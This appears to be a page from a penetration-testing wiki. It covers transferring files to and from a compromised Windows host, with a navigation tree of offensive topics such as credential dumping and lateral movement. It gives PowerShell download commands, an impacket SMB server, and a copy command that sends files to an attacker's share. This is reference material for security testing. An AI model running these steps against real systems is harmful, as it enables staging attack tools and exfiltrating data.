SecuriTreeHome

SecuriTree

  • Windows Security
    • Post-exploitation
      • Network Tunneling
        (Ligolo-ng, Chisel)
      • Reverse Shell
      • System Manipulation
      • File Transfer
    • Lateral Movement
      • Common Problems
        • Double Hop
        • Remote UAC
      • Techniques
        • Access Token Manipulation
          (RunAs, RunasCs)
        • Pass-the-Ticket (Kerberos)
          (Rubeus, getTGT)
      • Technologies
        • MS-RPC
          • MS-DCOM
          • MS-RRP
          • MS-SCMR
            (PsExec, SmbExec, ScExec)
          • MS-TSCH
          • MS-WMI
            (WmiExec)
        • RDP
        • WinRM
          (winrs, PS Remoting)
    • Domain Privesc
      • ACL Abuse
      • AD Delegation Abuse
        • Constrained Delegation
        • Resource-Based Constrained Delegation
        • Unconstrained Delegation
      • AS-Rep Roasting
      • Certificate Service Abuse
      • Credentials Dump
        • DCSync
        • LSASS Memory
        • Local SAM
        • Windows Vault
      • Group Policies
      • Information to steal
        (files, logs, processes, ...)
      • Kerberoasting
      • Local Admin Hunting
      • MSSQL Abuse
      • NTLM Hash Stealing
      • NTLM Relay
      • Password Spraying
      • RDP Hijacking
      • Tasks and Services Abuse
    • Reconnaissance
      • Active Directory
      • DNS
      • LDAP
      • NetBIOS
      • NFS
      • Port Scanning
      • RPC
      • SMB
      • SMTP
      • SNMP
#Windows Security #Post-exploitation #File Transfer

File Transfer

Once the system is compromised, very often the attacker needs to transfer some tool to the victim's system or download some file. Uploaded files are usually tools for further privilege escalation, credential harvesting or lateral movement. Files downloaded are mostly logs and output from tools.

From attacker to victim (upload)

Simple HTTP server

Attacker:

# Start HTTP server (directory listing of the current directory)
python -m http.server $port

Victim:

# Download file from URL
Invoke-WebRequest $url -Out $output_file
 
# Aliases to Invoke-WebRequest
wget $url -Out $output_file
iwr $url -Out $output_file
 
# Alternative way
(New-Object System.Net.WebClient).DownloadFile($url, $output_file)

IMPORTANT: It might be worth to check file integrity after download using MD5 hash: Get-FileHash $file -Algorithm MD5

Bidirectional

Simple SMB server

Attacker:

impacket-smbserver -smb2support -username $user -password $pass $share_name $mount_dir

Victim:

# Authenticate yourself against the share
net use \\$attacker_ip\$share /user:$user $pass
 
# Send to attacker
copy $file \\$attacker_ip\$share\
 
# Download from attacker
copy \\$attacker_ip\$share\$file $path

Existing SMB share

If there is some SMB share running on the victim's machine and you have access to it from both sides (attacker and victim), then you can use it to conveniently transfer files both ways.

Evil-WinRM

The evil-winrm tool is able to perform file transfer out of the box if only session is established.

Attacker (Evil-WinRM CLI):

> download $file
> send $file

C2 Frameworks

Probably all C2 frameworks have built-in file transfer feature implemented. Take a look at the documentation of the C2 framework you are using.

Children

File Transfer